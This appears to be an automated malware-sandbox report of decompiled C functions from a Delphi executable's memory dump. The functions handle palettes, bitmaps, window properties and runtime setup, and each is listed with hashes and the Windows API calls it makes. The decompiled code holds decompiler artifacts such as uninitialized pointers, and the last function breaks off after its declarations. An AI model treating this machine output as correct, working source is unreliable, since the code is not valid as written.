                                  • Instruction ID: 6bca1dfe9d5afdfc81d0abec7de6f1c846dd1943806f55e8eb55875c6f2e7381
                                  • Opcode Fuzzy Hash: e77851f6ed4db6b595f3bdff75b5207152b3204487869f168d846c86834e3117
                                  • Instruction Fuzzy Hash: F7318470B00254DFDB00EF95C841AAEBBB5FF49710F50816AFC14AB381C674AD51CB6A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 67%
                                  			E0042A7B4(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, struct HPALETTE__* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
                                  				char _v5;
                                  				struct HPALETTE__* _v12;
                                  				struct HDC__* _v16;
                                  				struct tagBITMAPINFO* _t36;
                                  				intOrPtr _t43;
                                  				struct HBITMAP__* _t47;
                                  				void* _t50;
                                  
                                  				_t36 = __ecx;
                                  				_t47 = __eax;
                                  				E0042A664(__eax, _a4, __ecx);
                                  				_v12 = 0;
                                  				_v16 = CreateCompatibleDC(0);
                                  				_push(_t50);
                                  				_push(0x42a851);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t50 + 0xfffffff4;
                                  				if(__edx != 0) {
                                  					_v12 = SelectPalette(_v16, __edx, 0);
                                  					RealizePalette(_v16);
                                  				}
                                  				_v5 = GetDIBits(_v16, _t47, 0, _t36->bmiHeader.biHeight, _a8, _t36, 0) != 0;
                                  				_pop(_t43);
                                  				 *[fs:eax] = _t43;
                                  				_push(0x42a858);
                                  				if(_v12 != 0) {
                                  					SelectPalette(_v16, _v12, 0);
                                  				}
                                  				return DeleteDC(_v16);
                                  			}











                                  APIs
                                    • Part of subcall function 0042A664: GetObjectA.GDI32(?,00000054), ref: 0042A678
                                  • CreateCompatibleDC.GDI32(00000000), ref: 0042A7D6
                                  • SelectPalette.GDI32(?,?,00000000), ref: 0042A7F7
                                  • RealizePalette.GDI32(?), ref: 0042A803
                                  • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0042A81A
                                  • SelectPalette.GDI32(?,00000000,00000000), ref: 0042A842
                                  • DeleteDC.GDI32(?), ref: 0042A84B
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Palette$Select$BitsCompatibleCreateDeleteObjectRealize
                                  • String ID:
                                  • API String ID: 1221726059-0
                                  • Opcode ID: 148b2893d1fac504bc4ce105bcd762a593a417b457847206cb32babcb09c190e
                                  • Instruction ID: 401f90ed770cec6a06f9266caed29e2ddd585762a0c57216d006dd8419cd5f3d
                                  • Opcode Fuzzy Hash: 148b2893d1fac504bc4ce105bcd762a593a417b457847206cb32babcb09c190e
                                  • Instruction Fuzzy Hash: 04114F75B002047FDB11EBA9DC81F5EB7FCEF88700F51806AB914E7281D67899108B69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00443A9C(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                  				char _v8;
                                  				void* _t20;
                                  				void* _t21;
                                  				void* _t27;
                                  				void* _t31;
                                  				void* _t35;
                                  				intOrPtr* _t43;
                                  
                                  				_t43 =  &_v8;
                                  				_t20 =  *0x4a0ce8; // 0x0
                                  				 *((intOrPtr*)(_t20 + 0x180)) = _a4;
                                  				_t21 =  *0x4a0ce8; // 0x0
                                  				SetWindowLongA(_a4, 0xfffffffc,  *(_t21 + 0x18c));
                                  				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
                                  					SetWindowLongA(_a4, 0xfffffff4, _a4);
                                  				}
                                  				_t27 =  *0x4a0ce8; // 0x0
                                  				SetPropA(_a4,  *0x4bcaea & 0x0000ffff, _t27);
                                  				_t31 =  *0x4a0ce8; // 0x0
                                  				SetPropA(_a4,  *0x4bcae8 & 0x0000ffff, _t31);
                                  				_t35 =  *0x4a0ce8; // 0x0
                                  				 *0x4a0ce8 = 0;
                                  				_v8 =  *((intOrPtr*)(_t35 + 0x18c))(_a4, _a8, _a12, _a16);
                                  				return  *_t43;
                                  			}











                                  APIs
                                  • SetWindowLongA.USER32 ref: 00443AC4
                                  • GetWindowLongA.USER32(?,000000F0), ref: 00443ACF
                                  • GetWindowLongA.USER32(?,000000F4), ref: 00443AE1
                                  • SetWindowLongA.USER32 ref: 00443AF4
                                  • SetPropA.USER32(?,00000000,00000000), ref: 00443B0B
                                  • SetPropA.USER32(?,00000000,00000000), ref: 00443B22
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: LongWindow$Prop
                                  • String ID:
                                  • API String ID: 3887896539-0
                                  • Opcode ID: dd5c66f0e5966027bebf58dbf438d66112e0852b6d0784a23f97aebe89105b78
                                  • Instruction ID: 18f268816a8d585fe9b3e4a48a7a3d1cce598fe18381e1b14f7a4e98008e497b
                                  • Opcode Fuzzy Hash: dd5c66f0e5966027bebf58dbf438d66112e0852b6d0784a23f97aebe89105b78
                                  • Instruction Fuzzy Hash: 18111275504204BFDF40DF9DDC84EDA3BA8BB09364F104225F918D7291D734EA40CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00429FD0(void* __eax, signed int __ecx) {
                                  				char _v1036;
                                  				signed int _v1038;
                                  				struct tagRGBQUAD _v1048;
                                  				short _v1066;
                                  				void* _t20;
                                  				struct HDC__* _t25;
                                  				void* _t28;
                                  				void* _t31;
                                  				struct HPALETTE__* _t33;
                                  				LOGPALETTE* _t34;
                                  
                                  				_t31 = __eax;
                                  				_t33 = 0;
                                  				_t34->palVersion = 0x300;
                                  				if(__eax == 0) {
                                  					_v1038 = __ecx;
                                  					E00402D04(_t28, __ecx << 2,  &_v1036);
                                  				} else {
                                  					_t25 = CreateCompatibleDC(0);
                                  					_t20 = SelectObject(_t25, _t31);
                                  					_v1066 = GetDIBColorTable(_t25, 0, 0x100,  &_v1048);
                                  					SelectObject(_t25, _t20);
                                  					DeleteDC(_t25);
                                  				}
                                  				if(_v1038 != 0) {
                                  					if(_v1038 != 0x10 || E00429F38(_t34) == 0) {
                                  						E00429DC8( &_v1036, _v1038 & 0x0000ffff);
                                  					}
                                  					_t33 = CreatePalette(_t34);
                                  				}
                                  				return _t33;
                                  			}














                                  APIs
                                  • CreateCompatibleDC.GDI32(00000000), ref: 00429FE9
                                  • SelectObject.GDI32(00000000,00000000), ref: 00429FF2
                                  • GetDIBColorTable.GDI32(00000000,00000000,00000100,?), ref: 0042A006
                                  • SelectObject.GDI32(00000000,00000000), ref: 0042A012
                                  • DeleteDC.GDI32(00000000), ref: 0042A018
                                  • CreatePalette.GDI32 ref: 0042A05E
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: CreateObjectSelect$ColorCompatibleDeletePaletteTable
                                  • String ID:
                                  • API String ID: 2515223848-0
                                  • Opcode ID: cb05b583d79fa0232cad0e2b1ec02a06926908cf28c26fa39e8cd081a778448b
                                  • Instruction ID: 34ab66e0089e6405cb177bb4262cc9b5e62266bcaa3fc7cef4ba08948bb38239
                                  • Opcode Fuzzy Hash: cb05b583d79fa0232cad0e2b1ec02a06926908cf28c26fa39e8cd081a778448b
                                  • Instruction Fuzzy Hash: E201966130432062E2147B2AAC47E9B72B89FC0758F45C82FF689A72C2E67D8C54835F
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004296A8(void* __eax) {
                                  				void* _t36;
                                  
                                  				_t36 = __eax;
                                  				UnrealizeObject(E00428C98( *((intOrPtr*)(__eax + 0x14))));
                                  				SelectObject( *(_t36 + 4), E00428C98( *((intOrPtr*)(_t36 + 0x14))));
                                  				if(E00428D78( *((intOrPtr*)(_t36 + 0x14))) != 0) {
                                  					SetBkColor( *(_t36 + 4),  !(E00427FD0(E00428C5C( *((intOrPtr*)(_t36 + 0x14))))));
                                  					return SetBkMode( *(_t36 + 4), 1);
                                  				} else {
                                  					SetBkColor( *(_t36 + 4), E00427FD0(E00428C5C( *((intOrPtr*)(_t36 + 0x14)))));
                                  					return SetBkMode( *(_t36 + 4), 2);
                                  				}
                                  			}





                                  APIs
                                    • Part of subcall function 00428C98: CreateBrushIndirect.GDI32(?), ref: 00428D42
                                  • UnrealizeObject.GDI32(00000000), ref: 004296B4
                                  • SelectObject.GDI32(?,00000000), ref: 004296C6
                                  • SetBkColor.GDI32(?,00000000), ref: 004296E9
                                  • SetBkMode.GDI32(?,00000002), ref: 004296F4
                                  • SetBkColor.GDI32(?,00000000), ref: 0042970F
                                  • SetBkMode.GDI32(?,00000001), ref: 0042971A
                                    • Part of subcall function 00427FD0: GetSysColor.USER32 ref: 00427FDA
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                  • String ID:
                                  • API String ID: 3527656728-0
                                  • Opcode ID: 0bf8573a89cf84b3894dff50b431fb09bcc409200c45980c22251b11ead8d36f
                                  • Instruction ID: 7383a5b9a6f387790e679a2e21ac38346014704ba7f38b963da7a20ea28431a8
                                  • Opcode Fuzzy Hash: 0bf8573a89cf84b3894dff50b431fb09bcc409200c45980c22251b11ead8d36f
                                  • Instruction Fuzzy Hash: DCF0BBB17051119BDE00FFBAEAC6D1B2BD89F08309741449AF909EF19BCA7DD8104B39
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040668D(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
                                  				long _t11;
                                  				void* _t16;
                                  
                                  				_t16 = __ebx;
                                  				 *__edi =  *__edi + __ecx;
                                  				 *((intOrPtr*)(__eax - 0x4bc5bc)) =  *((intOrPtr*)(__eax - 0x4bc5bc)) + __eax - 0x4bc5bc;
                                  				 *0x4a0008 = 2;
                                  				 *0x4bc014 = 0x4012b8;
                                  				 *0x4bc018 = 0x4012c0;
                                  				 *0x4bc04e = 2;
                                  				 *0x4bc000 = E00405228;
                                  				if(E00403448() != 0) {
                                  					_t3 = E00403478();
                                  				}
                                  				E0040353C(_t3);
                                  				 *0x4bc054 = 0xd7b0;
                                  				 *0x4bc220 = 0xd7b0;
                                  				 *0x4bc3ec = 0xd7b0;
                                  				 *0x4bc040 = GetCommandLineA();
                                  				 *0x4bc03c = E004013C8();
                                  				if((GetVersion() & 0x80000000) == 0x80000000) {
                                  					 *0x4bc5c0 = E004065C4(GetThreadLocale(), _t16, __eflags);
                                  				} else {
                                  					if((GetVersion() & 0x000000ff) <= 4) {
                                  						 *0x4bc5c0 = E004065C4(GetThreadLocale(), _t16, __eflags);
                                  					} else {
                                  						 *0x4bc5c0 = 3;
                                  					}
                                  				}
                                  				_t11 = GetCurrentThreadId();
                                  				 *0x4bc034 = _t11;
                                  				return _t11;
                                  			}






                                  APIs
                                    • Part of subcall function 00403448: GetKeyboardType.USER32 ref: 0040344D
                                    • Part of subcall function 00403448: GetKeyboardType.USER32 ref: 00403459
                                  • GetCommandLineA.KERNEL32 ref: 004066F3
                                  • GetVersion.KERNEL32 ref: 00406707
                                  • GetVersion.KERNEL32 ref: 00406718
                                  • GetCurrentThreadId.KERNEL32 ref: 00406754
                                    • Part of subcall function 00403478: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040349A
                                    • Part of subcall function 00403478: RegQueryValueExA.ADVAPI32 ref: 004034CD
                                    • Part of subcall function 00403478: RegCloseKey.ADVAPI32(?), ref: 004034E3
                                  • GetThreadLocale.KERNEL32 ref: 00406734
                                    • Part of subcall function 004065C4: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040662A), ref: 004065EA
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                  • String ID:
                                  • API String ID: 3734044017-0
                                  • Opcode ID: d7d543b54601d380fab14b47c42f309e37ee6fefa39e20c44b7827425fc43199
                                  • Instruction ID: 5e9bf025c90783b5fcd42b3f224221feb163a706cc1b8e5ba736bbca5cc48e64
                                  • Opcode Fuzzy Hash: d7d543b54601d380fab14b47c42f309e37ee6fefa39e20c44b7827425fc43199
                                  • Instruction Fuzzy Hash: 7C011EA5810381DBE711BFA5ACC63493AE0AB5130CF414B7FA441BA2F2E77C41148B6E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 83%
                                  			E0046840C(char __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                  				char _v8;
                                  				int _v12;
                                  				char _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _v24;
                                  				struct tagPOINT _v32;
                                  				char _v33;
                                  				intOrPtr _v40;
                                  				char _v44;
                                  				intOrPtr _v48;
                                  				struct HWND__* _v52;
                                  				intOrPtr _v56;
                                  				char _v60;
                                  				struct tagRECT _v76;
                                  				intOrPtr _v80;
                                  				intOrPtr _v84;
                                  				int _v88;
                                  				int _v92;
                                  				intOrPtr _v96;
                                  				char _v100;
                                  				struct tagRECT _v116;
                                  				char _v132;
                                  				intOrPtr _v136;
                                  				char _v140;
                                  				char _v144;
                                  				char _v148;
                                  				struct HWND__* _t130;
                                  				struct HWND__* _t166;
                                  				intOrPtr _t188;
                                  				char _t194;
                                  				intOrPtr _t218;
                                  				intOrPtr _t222;
                                  				void* _t238;
                                  				intOrPtr* _t250;
                                  				intOrPtr _t269;
                                  				intOrPtr _t270;
                                  				intOrPtr _t272;
                                  				intOrPtr _t278;
                                  				struct tagRECT* _t301;
                                  				intOrPtr* _t305;
                                  				intOrPtr _t306;
                                  				void* _t313;
                                  
                                  				_t312 = _t313;
                                  				_push(__ebx);
                                  				_push(__esi);
                                  				_push(__edi);
                                  				_v144 = 0;
                                  				_v148 = 0;
                                  				asm("movsd");
                                  				asm("movsd");
                                  				_v8 = __eax;
                                  				_t269 =  *0x45e048; // 0x45e04c
                                  				E00404D74( &_v100, _t269);
                                  				_t250 =  &_v8;
                                  				_push(_t313);
                                  				_push(0x468792);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t313 + 0xffffff70;
                                  				 *((char*)( *_t250 + 0x58)) = 0;
                                  				if( *((char*)( *_t250 + 0x88)) == 0 ||  *((intOrPtr*)( *_t250 + 0x60)) == 0 || E0045E420() == 0 || E00465B24(E004455C8( &_v16, 1)) !=  *((intOrPtr*)( *_t250 + 0x60))) {
                                  					L23:
                                  					_t130 = _v52;
                                  					__eflags = _t130;
                                  					if(_t130 <= 0) {
                                  						E00468150( *_t250);
                                  					} else {
                                  						E00467F58( *_t250, 0, _t130);
                                  					}
                                  					goto L26;
                                  				} else {
                                  					_v100 =  *((intOrPtr*)( *_t250 + 0x60));
                                  					_v92 = _v16;
                                  					_v88 = _v12;
                                  					_v88 = _v88 + E00468188();
                                  					_v84 = E00464E70();
                                  					_v80 =  *((intOrPtr*)( *_t250 + 0x5c));
                                  					E004466E4( *((intOrPtr*)( *_t250 + 0x60)),  &_v132);
                                  					_t301 =  &_v76;
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x60)))) + 0x40))();
                                  					_v32.x = 0;
                                  					_v32.y = 0;
                                  					_t305 =  *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x60)) + 0x30));
                                  					_t319 = _t305;
                                  					if(_t305 == 0) {
                                  						_t306 =  *((intOrPtr*)( *_t250 + 0x60));
                                  						_t278 =  *0x442c24; // 0x442c70
                                  						_t166 = E004037A4(_t306, _t278);
                                  						__eflags = _t166;
                                  						if(_t166 != 0) {
                                  							__eflags =  *(_t306 + 0x190);
                                  							if( *(_t306 + 0x190) != 0) {
                                  								ClientToScreen( *(_t306 + 0x190),  &_v32);
                                  							}
                                  						}
                                  					} else {
                                  						 *((intOrPtr*)( *_t305 + 0x40))();
                                  					}
                                  					OffsetRect( &_v76, _v32.x - _v24, _v32.y - _v20);
                                  					E00446888( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &_v16);
                                  					_v60 = _v140;
                                  					_v56 = _v136;
                                  					E00465AEC( *((intOrPtr*)( *_t250 + 0x60)),  &_v148);
                                  					E00443DC8(_v148,  &_v140,  &_v144, _t319);
                                  					E00404470( &_v44, _v144);
                                  					_v52 = 0;
                                  					_v48 =  *((intOrPtr*)( *_t250 + 0x74));
                                  					_t188 =  *0x4a0f2c; // 0x4432c8
                                  					_v96 = _t188;
                                  					_v40 = 0;
                                  					_t257 = 0;
                                  					_v33 = E00447F3C( *((intOrPtr*)( *_t250 + 0x60)), 0, 0xb030,  &_v100) == 0;
                                  					if(_v33 != 0 &&  *((short*)( *_t250 + 0x132)) != 0) {
                                  						_t257 =  &_v33;
                                  						 *((intOrPtr*)( *_t250 + 0x130))( &_v100);
                                  					}
                                  					if(_v33 == 0 ||  *((intOrPtr*)( *_t250 + 0x60)) == 0) {
                                  						_t194 = 0;
                                  					} else {
                                  						_t194 = 1;
                                  					}
                                  					_t284 =  *_t250;
                                  					 *((char*)( *_t250 + 0x58)) = _t194;
                                  					if( *((char*)( *_t250 + 0x58)) == 0) {
                                  						goto L23;
                                  					} else {
                                  						_t326 = _v44;
                                  						if(_v44 == 0) {
                                  							goto L23;
                                  						}
                                  						E004682E8(_v96, _t257, _t284, _t312);
                                  						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0x70))();
                                  						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0xd8))( &_v116, _v40);
                                  						OffsetRect( &_v116, _v92, _v88);
                                  						if(E00403814( *((intOrPtr*)( *_t250 + 0x84)), _t326) != 0) {
                                  							_t238 = E00468348(_v44, _t250, _t301, 0xffc8, _t312) + 5;
                                  							_v116.left = _v116.left - _t238;
                                  							_v116.right = _v116.right - _t238;
                                  						}
                                  						E0044685C( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &_v76);
                                  						_t218 =  *_t250;
                                  						 *((intOrPtr*)(_t218 + 0x64)) = _v140;
                                  						 *((intOrPtr*)(_t218 + 0x68)) = _v136;
                                  						E0044685C( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &(_v76.right));
                                  						_t222 =  *_t250;
                                  						 *((intOrPtr*)(_t222 + 0x6c)) = _v140;
                                  						 *((intOrPtr*)(_t222 + 0x70)) = _v136;
                                  						E00446EE4( *((intOrPtr*)( *_t250 + 0x84)), _v80);
                                  						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0xd4))(_v40);
                                  						E00465C38(_v44);
                                  						_t231 = _v52;
                                  						if(_v52 <= 0) {
                                  							E00467F58( *_t250, 1, _v48);
                                  						} else {
                                  							E00467F58( *_t250, 0, _t231);
                                  						}
                                  						L26:
                                  						_pop(_t270);
                                  						 *[fs:eax] = _t270;
                                  						_push(0x468799);
                                  						E004043FC( &_v148, 2);
                                  						_t272 =  *0x45e048; // 0x45e04c
                                  						return E00404E44( &_v100, _t272);
                                  					}
                                  				}
                                  			}

                                  APIs
                                    • Part of subcall function 0045E420: GetActiveWindow.USER32 ref: 0045E423
                                    • Part of subcall function 0045E420: GetCurrentThreadId.KERNEL32(0045E400), ref: 0045E438
                                    • Part of subcall function 0045E420: EnumThreadWindows.USER32 ref: 0045E43E
                                    • Part of subcall function 00468188: GetCursor.USER32 ref: 004681A3
                                    • Part of subcall function 00468188: GetIconInfo.USER32 ref: 004681A9
                                  • ClientToScreen.USER32(?,?), ref: 00468538
                                  • OffsetRect.USER32 ref: 0046854F
                                  • OffsetRect.USER32 ref: 0046867F
                                    • Part of subcall function 00467F58: SetTimer.USER32(00000000,00000000,?,00465B44), ref: 00467F72
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: OffsetRectThread$ActiveClientCurrentCursorEnumIconInfoScreenTimerWindowWindows
                                  • String ID: LE$p,D
                                  • API String ID: 2591747986-1459914165
                                  • Opcode ID: 3f514d1b279f4684ea7dcbc786024fd66dd162b6d4eb07ddb02efb51497773fe
                                  • Instruction ID: 4df6cd0bd6e22d9b73dfc7cb0f771a4b9e35a04e1be34146c9ff92ad727a439d
                                  • Opcode Fuzzy Hash: 3f514d1b279f4684ea7dcbc786024fd66dd162b6d4eb07ddb02efb51497773fe
                                  • Instruction Fuzzy Hash: 9EC1F875A006188FCB10DFA8C880E9EB7F5BF09304F5541AAE505EB366EB34AD49CF56
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 95%
                                  			E0042E8CC(intOrPtr* __eax, void* __edx) {
                                  				intOrPtr* _v8;
                                  				struct HPALETTE__* _v12;
                                  				char _v13;
                                  				intOrPtr _v25;
                                  				intOrPtr _v29;
                                  				intOrPtr _v33;
                                  				intOrPtr _v57;
                                  				short _v59;
                                  				short _v61;
                                  				intOrPtr _v65;
                                  				intOrPtr _v69;
                                  				intOrPtr _v73;
                                  				intOrPtr _v77;
                                  				intOrPtr _v89;
                                  				intOrPtr _v93;
                                  				void _v97;
                                  				void* _t44;
                                  				void* _t46;
                                  				intOrPtr _t49;
                                  				void* _t54;
                                  				struct HPALETTE__* _t56;
                                  				void* _t72;
                                  				void* _t74;
                                  				void* _t75;
                                  				struct HDC__* _t76;
                                  				intOrPtr _t97;
                                  				void* _t107;
                                  				void* _t109;
                                  				void* _t110;
                                  				intOrPtr _t112;
                                  
                                  				_t107 = _t109;
                                  				_t110 = _t109 + 0xffffffa0;
                                  				_t72 = __edx;
                                  				_v8 = __eax;
                                  				_t44 = E0042D9A8(_v8);
                                  				if(_t72 == _t44) {
                                  					L16:
                                  					return _t44;
                                  				} else {
                                  					_t46 = _t72 - 1;
                                  					if(_t46 < 0) {
                                  						_t44 =  *((intOrPtr*)( *_v8 + 0x6c))();
                                  						goto L16;
                                  					} else {
                                  						if(_t46 == 7) {
                                  							_t49 =  *0x4bae30; // 0x4263a4
                                  							_t44 = E0042979C(_t49);
                                  							goto L16;
                                  						} else {
                                  							E00402FB0( &_v97, 0x54);
                                  							_t54 = memcpy( &_v97,  *((intOrPtr*)(_v8 + 0x28)) + 0x18, 6 << 2);
                                  							_t112 = _t110 + 0xc;
                                  							_v13 = 0;
                                  							_v77 = 0;
                                  							_v73 = 0x28;
                                  							_v69 = _v93;
                                  							_v65 = _v89;
                                  							_v61 = 1;
                                  							_v59 =  *0x004A08BF & 0x000000ff;
                                  							_v12 =  *((intOrPtr*)(_t54 + 0x10));
                                  							_t74 = _t72 - 2;
                                  							if(_t74 == 0) {
                                  								_t56 =  *0x4bc890; // 0xe4080bba
                                  								_v12 = _t56;
                                  							} else {
                                  								_t75 = _t74 - 1;
                                  								if(_t75 == 0) {
                                  									_t76 = E004298D4(GetDC(0));
                                  									_v12 = CreateHalftonePalette(_t76);
                                  									_v13 = 1;
                                  									ReleaseDC(0, _t76);
                                  								} else {
                                  									if(_t75 == 2) {
                                  										_v57 = 3;
                                  										_v33 = 0xf800;
                                  										_v29 = 0x7e0;
                                  										_v25 = 0x1f;
                                  									}
                                  								}
                                  							}
                                  							 *[fs:eax] = _t112;
                                  							 *((char*)(_v8 + 0x22)) = E0042D488( *((intOrPtr*)( *_v8 + 0x64))( *[fs:eax], 0x42ea19, _t107),  &_v97) & 0xffffff00 | _v12 != 0x00000000;
                                  							_pop(_t97);
                                  							 *[fs:eax] = _t97;
                                  							_push(0x42ea20);
                                  							if(_v13 != 0) {
                                  								return DeleteObject(_v12);
                                  							}
                                  							return 0;
                                  						}
                                  					}
                                  				}
                                  			}

                                  APIs
                                  • GetDC.USER32(00000000), ref: 0042E989
                                  • CreateHalftonePalette.GDI32(00000000), ref: 0042E996
                                  • ReleaseDC.USER32(00000000,00000000), ref: 0042E9A5
                                  • DeleteObject.GDI32(00000000), ref: 0042EA13
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: CreateDeleteHalftoneObjectPaletteRelease
                                  • String ID: (
                                  • API String ID: 577518360-3887548279
                                  • Opcode ID: a04fe8107923636f8f5f6b37d4746c9cd68659e9474c3a57b10d712689bffbcd
                                  • Instruction ID: f5e3a01e5c639e4baebaadd96e3c1e631a1deada1dbef49bdc2e10035d049f97
                                  • Opcode Fuzzy Hash: a04fe8107923636f8f5f6b37d4746c9cd68659e9474c3a57b10d712689bffbcd
                                  • Instruction Fuzzy Hash: C541C470B04218DFDB10DFA6E445B9EB7F2EF4A304F9040ABE404AB391D6786E45DB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040C840(intOrPtr* __eax, void* __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _v16;
                                  				char _v277;
                                  				char _v538;
                                  				char _v794;
                                  				struct _MEMORY_BASIC_INFORMATION _v824;
                                  				char _v828;
                                  				intOrPtr _v832;
                                  				char _v836;
                                  				intOrPtr _v840;
                                  				char _v844;
                                  				intOrPtr _v848;
                                  				char _v852;
                                  				char* _v856;
                                  				char _v860;
                                  				char _v864;
                                  				char _v1120;
                                  				void* __edi;
                                  				struct HINSTANCE__* _t45;
                                  				intOrPtr _t58;
                                  				struct HINSTANCE__* _t60;
                                  				void* _t78;
                                  				intOrPtr* _t83;
                                  				void* _t94;
                                  				void* _t95;
                                  				void* _t102;
                                  
                                  				_t102 = __fp0;
